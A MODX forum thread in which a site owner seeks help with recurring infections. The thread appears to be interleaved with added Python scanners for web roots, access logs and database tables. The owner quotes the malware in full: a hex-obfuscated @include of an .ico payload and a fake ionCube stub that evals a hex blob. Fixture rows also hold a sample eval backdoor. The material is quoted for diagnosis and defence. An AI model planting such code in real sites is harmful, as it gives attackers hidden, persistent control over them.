    hartmanrik (10 posts):
    After hours and hours of reading and trial and error I'm out of options.

    Installation info:

    • MODX version: 2.6.1
    • PHP version: 5.6.33
    • DB info: mysql, version: 10.0.29-MariaDB-cll-lve

    My MODX installations keep getting compromised.
    Malicious code is injected in certain index.php files. Example:

    /*3e166*/
    
    @include "\x2fho\x6de/\x64eb\x3950\x391/\x64om\x61in\x73/m\x69dd\x65lb\x75rg\x67ez\x69ch\x74va\x6ede\x73ta\x64.n\x6c/p\x75bl\x69c_\x68tm\x6c/a\x73se\x74s/\x63om\x70on\x65nt\x73/r\x65ca\x70tc\x68av\x32/f\x61vi\x63on\x5f20\x324c\x36.i\x63o";
    
    /*3e166*/
    


    The includes refer to ICO files, which contain scrambled code.

    Besides this, the hack also creates new, random, files, like:
    ucwuwapz.php
    footer21.php
    vexwzlkn.php

    Contents of footer21.php (similar to the other files):
    <?php //000310
    if (!extension_loaded('IonCube_loader')) {$__oc = strtolower(substr(php_uname(), 0, 3));$__ln = 'ioncube_loader_' . $__oc . '_' . substr(phpversion(), 0, 3) . (($__oc == 'win') ? '.dll' : '.so');if (function_exists('il_exec')) {return il_exec();}$__ln = '/ioncube/' . $__ln;$__ln = "preg_replace";$__oid = @fopen(__FILE__, 'rb');$__id = realpath('extension_dir');$__here = dirname(__FILE__);if (strlen($__id) > 1 && $__id[1] == ':') {$__id = str_replace('\\', '/', substr($__id, 2));$__here = str_replace('\\', '/', substr($__here, 2));}$__rd = "/" . str_repeat('/..', substr_count($__id, '/')) . $__here . '/';$__i = strlen($__rd);while ($__i--) {if ($__rd[$__i] == '/') {$__lp = substr($__rd, 0, $__i) . $__ln;if ($__lp = fread($__oid, @filesize(__FILE__))) {$__ln = pack("H*", $__ln("/[A-Z,\r,\n]/", "", substr($__lp, 0x99d-0x4ed)));break;}}}eval($__ln);return 0;} else {die('The file ' . __FILE__ . " is corrupted.\n");}if (function_exists('il_exec')) {return il_exec();}echo('Please check System Requirements on vendor site because the file <b>' . __FILE__ . '</b> requires the ionCube PHP Loader ' . basename($__ln) . ' to be installed by the site administrator.');return 0;
    
    ?>
    2473S6D9I7X66E568X20S3d2041Z7D2726179S2827776V8C7a7Oa746dI2V73d3e277aL6Ga6T1
    65H6H8O64T272D9D3b2472T6Lc64O772G0H3GdH20417L27A26A1792W82T7N686Pf7979H2N73
    DdT3e2E76dF6Xe6D7706fC272M93b666Hf72K65P6Q1636Q82028T41727S261I7M92824736J9
    7U66A5Q6U82Ec20245LfQ504Wf5354K2c2024L7Q2Y6c6477D2c20R2S45f43B4VfC4fO4Eb494
    52S920P617Y3A20247275Z7475D2W9207Pb6B66VfD7B26H56R163Y682V02M82N4727T57P4I7
    G520K6P1732L02479666bW6Y5W6Bf203d3e2024V646R8X6I776R2L92L0M7Mb24646O8X6776C
    2C0Q3Vd2Q040F70L6163X6b28T22T4W8Z2aU222XcW2B02464686B776293Db24Y796N66b6G56
    fP202e3dS2K022S32L663430Q3E861G63632dU626566612Td3432X3C733G2dT393P038642Rd
    N3F5U63I3A833V33W6D5Z62663534N35O31223b24H657Va6bD6aJ78203Fd2G0W24646867F7S
    6F205e2O07T37S56N27374A7P22T8B7374V72O5f7Y2S6C5V706561C742824M79Q6H66b656f2
    BcN202V873M7472L6c65U6e28X24646867O7629202f2073747B26Hc656e2H8E2H4Z796F6D6b
    G65C6f29Q29V2A02Gb2D0I312Z9Z2c2T0302c20737L472U6c6E56e28A24H646V8M6N776292N
    93bW24L657a6b6aD78D20W3dX206578706cB6Lf64652P8E2D223222Vc2Q024X657a6PbR6aI7
    829G3bM69662028B6B36Uf75B6Ie7428W24U6K5M7a6NbU6a78Z29203Fd3dJ20P332Z920W7b6
    5D76A61S6cE28C24657DaN6b6a785Hb3W15dO28F2P4Y657a6bM6aU78B5bX325d292V9M3b657
    O8J6974O282J93bV7dA7d7d
    


    Another practical problem is that MODX sites that are infected will stop working after a while.

    I did all the standard stuff and followed the excellent guide at https://forums.modx.com/thread/94643/how-to-clean-up-your-hacked-webspace


    • Checked for malicious plugins/users
    • Changed all passwords, from MODX users to DirectAdmin/FTP/DB
    • Moved the website to a new hosting account
    • Used the guide mentioned earlier to identify malicious includes via SSH

    Unfortunately this will only temporarily remove the infection.
    Right now the only thing I can do is run a cron job that removes all unwanted ICO files from my host every hour...

    I'm not sure if this is a specific MODX related infection. The truth is that only MODX-installations are affected right now.

    Is there someone who experienced the same problems and found a solution? Any advice is welcome!

    Thanks in advance. [ed. note: hartmanrik last edited this post 6 years, 1 month ago.]
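    The two artefacts described in this post (the marker-wrapped `@include` of a hex-escaped path, and the loader-lookalike stub that reads itself back and evals a hex blob) can be triaged mechanically. The following Python scanner is an added example, not code from the post or from MODX. It decodes the PHP `\xNN` escapes to reveal the real include target, reports when that target is not a PHP file (the .ico case), flags the stub by the combination of `fopen(__FILE__)`, `pack("H*")` and `eval`, and applies the stub's own transform to the payload blob. The sample files, the marker `a1b2c` and the paths in them are constructed for the example; the only input taken from the post is the first line of the blob under footer21.php.

```python
import os
import re
from typing import List, Tuple

# Constructed fixture (not from the page; marker and path invented): an index.php
# prologue in the shape described above, i.e. a hash-like marker comment, an
# @include whose path is written with PHP "\xNN" escapes, and the marker again.
SAMPLE_INFECTED = r'''<?php
/*a1b2c*/

@include "\x2fva\x72/w\x77w/\x68tm\x6c/a\x73se\x74s/\x66av\x69co\x6e_9\x39.i\x63o";

/*a1b2c*/

require_once dirname(__FILE__) . '/config.core.php';
'''

# Constructed fixture in the style of footer21.php above, reduced to the calls
# that matter: the file re-opens itself, strips non-hex characters from a
# trailing blob, unpacks the hex with pack("H*") and evals the result.
SAMPLE_STUB = r'''<?php //000310
if (!extension_loaded('IonCube_loader')) {$__f = @fopen(__FILE__, 'rb');
$__b = fread($__f, @filesize(__FILE__));
eval(pack("H*", preg_replace("/[A-Z,\r,\n]/", "", substr($__b, 0x99d-0x4ed))));return 0;}
?>
'''

SAMPLE_CLEAN = "<?php\nrequire_once dirname(__FILE__) . '/config.core.php';\n"

# First line of the blob posted under footer21.php above (the one input taken from the page).
PAGE_BLOB_LINE1 = "2473S6D9I7X66E568X20S3d2041Z7D2726179S2827776V8C7a7Oa746dI2V73d3e277aL6Ga6T1"

_PHP_ESCAPE = re.compile(r'\\(x[0-9A-Fa-f]{1,2}|[0-7]{1,3}|u\{[0-9A-Fa-f]+\}|[nrtvef\\$"])')
_SIMPLE = {'n': '\n', 'r': '\r', 't': '\t', 'v': '\v', 'e': '\x1b', 'f': '\f',
           '\\': '\\', '$': '$', '"': '"'}
_INCLUDE = re.compile(r'@?(?:include|require)(?:_once)?\s*\(?\s*"(?P<lit>(?:[^"\\]|\\.)*)"\s*\)?\s*;')
_MARKER = re.compile(r'/\*([0-9a-f]{3,8})\*/')
_CODE_EXT = ('.php', '.phtml', '.inc')


def decode_php_dq(literal: str) -> str:
    """Resolve the escapes PHP honours in a double-quoted string: \\xNN, octal,
    \\u{...} and the single-character ones.  Unknown escapes stay literal, as in PHP."""
    def repl(m):
        esc = m.group(1)
        if esc[0] == 'x':
            return chr(int(esc[1:], 16))
        if esc[0] == 'u':
            return chr(int(esc[2:-1], 16))
        if esc[0] in '01234567':
            return chr(int(esc, 8) & 0xFF)
        return _SIMPLE[esc]
    return _PHP_ESCAPE.sub(repl, literal)


def find_obfuscated_includes(src: str) -> List[Tuple[str, str]]:
    """(marker, decoded path) for every include/require whose path literal uses
    escape sequences.  A legitimate include never needs "\\x2f" for "/", so the
    escapes alone are the signal; the marker is the /*hex*/ comment, if any,
    that precedes the statement as in the injected prologue."""
    hits = []
    for m in _INCLUDE.finditer(src):
        lit = m.group('lit')
        if '\\x' not in lit and not re.search(r'\\[0-7]', lit):
            continue
        markers = _MARKER.findall(src[max(0, m.start() - 64):m.start()])
        hits.append((markers[-1] if markers else '', decode_php_dq(lit)))
    return hits


def is_self_decoding_stub(src: str) -> bool:
    """Flag the loader lookalike: reads __FILE__ back, hex-unpacks with pack("H*")
    and evals, all within the first few KB.  A genuine ionCube stub reports the
    missing loader and exits; it has no eval."""
    head = src[:4096]
    return all(n in head for n in ('fopen(__FILE__', 'pack("H*"', 'eval('))


def decode_stub_payload(blob: str) -> str:
    """Apply the stub's own transform to its trailing blob: drop [A-Z,\\r\\n]
    (the preg_replace) and turn the remaining hex digits into bytes (pack "H*").
    A dangling odd nibble is discarded here."""
    digits = re.sub(r'[A-Z,\r\n]', '', blob)
    digits = digits[:len(digits) // 2 * 2]
    return bytes.fromhex(digits).decode('latin-1')


def scan_source(src: str) -> List[str]:
    """Findings for one file's contents, as short labelled strings."""
    findings = []
    for marker, path in find_obfuscated_includes(src):
        kind = 'target' if path.lower().endswith(_CODE_EXT) else 'non-code target'
        findings.append(f'obfuscated include (marker {marker or "none"}) -> {kind} {path}')
    if is_self_decoding_stub(src):
        findings.append('self-decoding loader stub (fopen(__FILE__) + pack("H*") + eval)')
    return findings


def scan_tree(root: str) -> List[Tuple[str, str]]:
    """Walk a web root and return (file, finding) pairs for every PHP file."""
    out = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith(_CODE_EXT):
                continue
            full = os.path.join(dirpath, name)
            try:
                with open(full, 'r', encoding='latin-1') as fh:
                    out.extend((full, f) for f in scan_source(fh.read()))
            except OSError:
                continue
    return out


if __name__ == '__main__':
    import sys
    for path, finding in scan_tree(sys.argv[1] if len(sys.argv) > 1 else '.'):
        print(f'{path}: {finding}')
```

    Run it against the web root (`python scan.py /path/to/public_html`) and keep the output: the decoded include targets tell you where the ICO payloads live, and the stub findings list the dropped entry points that an hourly "delete the .ico files" cron job leaves in place. Feeding the first blob line from the post into `decode_stub_payload` yields the beginning of a PHP array assignment (`$siveh = Array(...`), which is what the stub would hand to `eval`.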
      andytough (571 posts):
      I think it would be a good idea to notify the MODX Security team about this:

      https://develop.modx.com/contribute/security/report/

        If I help you out on these forums I would be very grateful if you would consider rating me on Trustpilot: https://uk.trustpilot.com/review/andytough.com

        email: [email protected] | website: https://andytough.com
        andytough (571 posts):
        Is it possible that the sites were initially infected whilst running MODX 2.5.1 or below?
          hartmanrik (10 posts):
          Quote from: andytough at Feb 26, 2018, 11:48 AM
          Is it possible that the sites were initially infected whilst running MODX 2.5.1 or below?

          That's certainly possible and most likely the case!

            hartmanrik (10 posts):
            Quote from: andytough at Feb 26, 2018, 11:47 AM
            I think it would be a good idea to notify the MODX Security team about this:

            https://develop.modx.com/contribute/security/report/


            Thanks for the advice, I filed a report!
              andytough (571 posts):
              This will not help with a site that is already compromised but there is some good advice here:

              https://docs.modx.com/revolution/2.x/administering-your-site/security/hardening-modx-revolution
              Mark Hamstra:
                Quote from: andytough at Feb 26, 2018, 11:47 AM
                I think it would be a good idea to notify the MODX Security team about this:

                https://develop.modx.com/contribute/security/report/


                The security team is not meant for "my site keeps getting hacked, please help me fix it" but for "here is a specific security issue that I want to disclose responsibly" type situations. Keep in mind MODX is predominantly a volunteer-run project.

                Commercial support can be found at https://modx.com/services/ and other sources.

                It sounds like the attacker managed to put in a backdoor somewhere allowing them to come back after you've cleaned up. You'll need to track that down and close that. It can be easier to wipe the server clean and to start installing things from scratch (reviewing EVERYTHING that you copy/paste/import) to eliminate some random file tucked away being the source.

                Also, if it's happening often enough that you've set up an hourly cron job to clean things up, chances are that you can pinpoint the source/backdoor through server logs.
                  Mark Hamstra • Developer spending his days working on Premium Extras and a MODX Site Dashboard with the ability to remotely upgrade MODX and extras to make the MODX world a little better.

                  Tweet me @mark_hamstra, check my infrequent blog at markhamstra.com, my slightly more frequent ramblings at MODX.today or see code at Github.
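                  Mark's point that an hourly reinfection should be traceable in the server logs, as an added example (my code, not Mark's or MODX's): parse an access log, list requests to PHP files that are not part of a known-good install (the randomly named files from the first post are flagged regardless of the allowlist), and show what the same client requested in the minutes before its first hit on each such file. That preceding request is usually the upload or connector call that planted the file. The log lines, the allowlist and the component path `assets/components/example/connector.php` are constructed for the example; only the dropped-file names come from the first post.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Set

# Constructed access-log lines (Apache combined format).  IPs are documentation
# ranges, the component path is invented, the dropped-file names are the ones
# listed in the first post.
SAMPLE_LOG = """\
10.0.0.5 - - [26/Feb/2018:09:12:01 +0100] "GET / HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.5 - - [26/Feb/2018:09:12:02 +0100] "GET /assets/css/site.css HTTP/1.1" 200 812 "-" "Mozilla/5.0"
198.51.100.23 - - [26/Feb/2018:09:40:11 +0100] "POST /assets/components/example/connector.php?action=upload HTTP/1.1" 200 18 "-" "python-requests/2.18.4"
198.51.100.23 - - [26/Feb/2018:09:40:13 +0100] "POST /ucwuwapz.php HTTP/1.1" 200 211 "-" "python-requests/2.18.4"
198.51.100.23 - - [26/Feb/2018:09:40:15 +0100] "POST /ucwuwapz.php HTTP/1.1" 200 40 "-" "python-requests/2.18.4"
203.0.113.9 - - [26/Feb/2018:10:02:40 +0100] "GET /index.php?id=3 HTTP/1.1" 200 4411 "-" "Mozilla/5.0"
198.51.100.23 - - [26/Feb/2018:11:15:00 +0100] "POST /footer21.php HTTP/1.1" 200 12 "-" "curl/7.58.0"
"""

# Constructed allowlist.  In practice: every *.php path in a freshly extracted
# MODX archive plus the extras you installed yourself.
KNOWN_PHP = {'/index.php', '/connectors/index.php',
             '/assets/components/example/connector.php'}

_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)')
_RANDOM_NAME = re.compile(r'^/[a-z]{8}\.php$')   # ucwuwapz.php, vexwzlkn.php, ...


def parse_line(line: str) -> Optional[dict]:
    """One combined-format line to a dict, or None for lines that do not parse."""
    m = _LINE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d['ts'] = datetime.strptime(d['ts'], '%d/%b/%Y:%H:%M:%S %z')
    d['path'] = d['target'].split('?', 1)[0]   # drop the query string
    d['status'] = int(d['status'])
    return d


def parse_log(text: str) -> List[dict]:
    return [e for e in (parse_line(l) for l in text.splitlines()) if e]


def suspect_paths(entries: List[dict], known: Set[str]) -> Dict[str, List[dict]]:
    """Requests to PHP files outside the allowlist, grouped by path.  Eight
    lowercase letters plus .php is flagged even when the allowlist is incomplete."""
    hits = defaultdict(list)
    for e in entries:
        p = e['path']
        if p.endswith('.php') and (_RANDOM_NAME.match(p) or p not in known):
            hits[p].append(e)
    return dict(hits)


def lead_in_requests(entries: List[dict], path: str, window: timedelta) -> List[dict]:
    """Requests from the same client in the window before its first hit on
    `path`: where the upload or connector call that created the file shows up."""
    first = min((e for e in entries if e['path'] == path),
                key=lambda e: e['ts'], default=None)
    if first is None:
        return []
    lo = first['ts'] - window
    return [e for e in entries if e['ip'] == first['ip'] and lo <= e['ts'] < first['ts']]


def triage(text: str, known: Set[str], window_s: int = 120) -> Dict[str, dict]:
    """Per suspect path: first sighting, clients, POST count and lead-in requests."""
    entries = parse_log(text)
    report = {}
    for path, reqs in suspect_paths(entries, known).items():
        report[path] = {
            'first_seen': min(r['ts'] for r in reqs),
            'clients': sorted({r['ip'] for r in reqs}),
            'posts': sum(1 for r in reqs if r['method'] == 'POST'),
            'lead_in': [(e['method'], e['target'])
                        for e in lead_in_requests(entries, path, timedelta(seconds=window_s))],
        }
    return report


if __name__ == '__main__':
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LOG
    for path, info in sorted(triage(text, KNOWN_PHP).items(), key=lambda kv: kv[1]['first_seen']):
        print(f"{info['first_seen']:%Y-%m-%d %H:%M:%S} {path}: {info['posts']} POST(s) "
              f"from {', '.join(info['clients'])}")
        for method, target in info['lead_in']:
            print(f"    preceded by {method} {target}")
```

                  On the constructed log this reports the first `POST /ucwuwapz.php` two seconds after a `POST` to the component connector from the same client, which is the request to investigate (and the file to compare against the shipped extra). Widen `window_s` if the planting and first use are further apart, and run it over rotated logs too, since the initial compromise may predate the current log by a long time.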
                  andytough (571 posts):
                  The security team is not meant for "my site keeps getting hacked, please help me fix it" but for "here is a specific security issue that I want to disclose responsibly" type situations. Keep in mind MODX is predominantly a volunteer-run project.

                  Sorry Mark. I was just concerned in case there might have been some new vulnerability in play.
                  smashingred:
                    @hartmanrik we received your email, however, for issues where your site has been hacked, the best place to send a message is to [email protected].

                    The hack you report is almost certainly the one closed in 2.2.15/16, and most of these sites were initially compromised quite some time ago; however, we've seen many sites reinfected and more deeply. It can be extremely difficult to clean these sites. In addition, in the last 6 months, we've also seen the site_content table get altered on some compromises.

                    Send in a report and we'll let you know the options. [ed. note: smashingred last edited this post 6 years, 1 month ago.]
                      Author of zero books. Formerly of many strange things. Pairs well with meats. Conversations are magical experiences. He's dangerous around code but a markup magician. BlogTwitterLinkedInGitHub
                    smashingred:
                      Quote from: andytough at Feb 26, 2018, 12:35 PM

                      Sorry Mark. I was just concerned in case there might have been some new vulnerability in play.

                      The symptoms reported are identical to the compromise of sites at or below 2.2.15. Many sites became compromised within a year of the exploit being released. Unfortunately, despite repeated pleas, emails, social media posts and security reminders, people for one reason or another do not keep their MODX sites abreast of current versions. The exploits are growing deeper and more harmful, yet we continue to see people with sites running 2.2.8 etc.

                      If a site is running 2.2.15 or below, it should be assumed that it's compromised with backdoors, plugins, snippets and malicious users; in addition, it's likely that originally legitimate users have had their passwords changed to allow for undetected access. I've seen lots of Manager Logs that indicate that in many cases attackers are, in fact, logging in, if they have good enough access to do things like send email or mine bitcoin (which is something we're seeing happen now).
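                      The two database-side symptoms raised in these replies (the site_content table being altered, and backdoors living in plugins and snippets rather than only in files) call for a check that file scanning cannot do. The following is an added example, not tooling from smashingred or from MODX: it scans the code and markup columns of the three tables for injection indicators and lists resources saved after a cutoff. Table and column names are assumed to match the MODX Revolution 2.x defaults with the default `modx_` prefix (adjust for your `table_prefix`); the rows are constructed for the example, and the in-memory SQLite database stands in for MySQL, against which the same queries work unchanged.

```python
import re
import sqlite3
from typing import List, Tuple

# Table and column names assumed to match MODX Revolution 2.x defaults with the
# default "modx_" prefix; adjust to your table_prefix.  Only id and the code or
# markup column of each table are read.
TARGETS = [('modx_site_content', 'content'),
           ('modx_site_snippets', 'snippet'),
           ('modx_site_plugins', 'plugincode')]

# Indicators of injected code or markup, ordered from most to least specific.
INDICATORS = [
    ('eval of decoded data', re.compile(
        r'\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13|pack)\s*\(', re.I)),
    ('eval', re.compile(r'\beval\s*\(', re.I)),
    ('create_function', re.compile(r'\bcreate_function\s*\(', re.I)),
    ('preg_replace with /e', re.compile(r'preg_replace\s*\(\s*["\'][^"\']*/[a-z]*e[a-z]*["\']', re.I)),
    ('hex-escaped string', re.compile(r'(?:\\x[0-9a-f]{2}){4,}', re.I)),
    ('remote script tag', re.compile(r'<script[^>]+src\s*=\s*["\']?(?:https?:)?//', re.I)),
    ('iframe', re.compile(r'<iframe\b', re.I)),
]

# Constructed fixture rows (not real site data): one clean and one injected
# row per table.  editedon is a Unix timestamp, as MODX stores it.
FIXTURE_ROWS = {
    'modx_site_content': [
        (1, 'Home', '<p>Welcome to the site.</p>', 1500000000),
        (2, 'Contact', '<p>Mail us.</p><script src="//example.net/x.js"></script>', 1519632000),
    ],
    'modx_site_snippets': [
        (1, 'siteName', "return $modx->getOption('site_name');"),
        (2, 'footerHelper', "eval(base64_decode($_POST['p']));"),
    ],
    'modx_site_plugins': [
        (1, 'YearTag', "$modx->resource->_output = str_replace('{{year}}', date('Y'), $modx->resource->_output);", 0),
        (2, 'Cache', r'$f = "\x70\x68\x70\x69\x6e\x66\x6f"; $f();', 0),
    ],
}


def build_fixture() -> sqlite3.Connection:
    """In-memory stand-in for the three tables; against a live site point the
    same queries at MySQL (or at a mysqldump loaded into a scratch database)."""
    conn = sqlite3.connect(':memory:')
    conn.executescript("""
        CREATE TABLE modx_site_content (id INTEGER, pagetitle TEXT, content TEXT, editedon INTEGER);
        CREATE TABLE modx_site_snippets (id INTEGER, name TEXT, snippet TEXT);
        CREATE TABLE modx_site_plugins (id INTEGER, name TEXT, plugincode TEXT, disabled INTEGER);
    """)
    for table, rows in FIXTURE_ROWS.items():
        marks = ','.join('?' * len(rows[0]))
        conn.executemany(f'INSERT INTO {table} VALUES ({marks})', rows)
    return conn


def scan_tables(conn: sqlite3.Connection) -> List[Tuple[str, int, str]]:
    """(table, id, indicator) for every row whose code/markup column matches.
    Table and column names come from the TARGETS constant only, never from
    user input, which is the only reason an f-string is acceptable here."""
    findings = []
    for table, column in TARGETS:
        for row_id, body in conn.execute(f'SELECT id, {column} FROM {table}'):
            for label, pat in INDICATORS:
                if body and pat.search(body):
                    findings.append((table, row_id, label))
    return findings


def recently_edited(conn: sqlite3.Connection, since: int) -> List[Tuple[int, str]]:
    """Resources saved after a Unix time: with site_content being altered,
    anything edited after the last known-good backup needs a look."""
    return list(conn.execute(
        'SELECT id, pagetitle FROM modx_site_content WHERE editedon >= ? ORDER BY editedon',
        (since,)))


if __name__ == '__main__':
    conn = build_fixture()
    for table, row_id, label in scan_tables(conn):
        print(f'{table} id={row_id}: {label}')
    for row_id, title in recently_edited(conn, 1519000000):
        print(f'edited after cutoff: id={row_id} {title!r}')
```

                      Treat hits as leads rather than verdicts: a legitimate plugin can use `eval` or a hex string, so compare each flagged row against the extra's shipped source. Review the manager user list and the Manager Log alongside this, since the replies above describe attackers logging in with changed passwords, which no content scan will surface.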